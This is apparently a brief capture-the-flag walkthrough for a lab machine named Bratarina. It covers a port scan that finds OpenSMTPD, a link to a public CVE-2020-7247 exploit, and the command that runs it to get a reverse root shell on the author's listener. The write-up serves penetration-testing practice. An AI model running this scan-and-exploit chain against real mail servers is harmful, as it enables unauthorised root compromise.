Bratarina

nmap

mkdir nmap 
sudo rustscan -a 192.168.225.71 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-vuln-scan --script vuln

OpenSMTPD is open on port 25

There's a possible RCE on this particular service.

After doing some GoogleFu, I found this better version of the exploit: https://github.com/QTranspose/CVE-2020-7247-exploit

Copy the main.py file in your local machine. And install pwntools

pip3 install pwntools

Run the exploit

sudo python exploit.py 192.168.225.71 25 192.168.49.225 80 root

And you should get your root shell.

Thanks for reading!

Last updated 4 years ago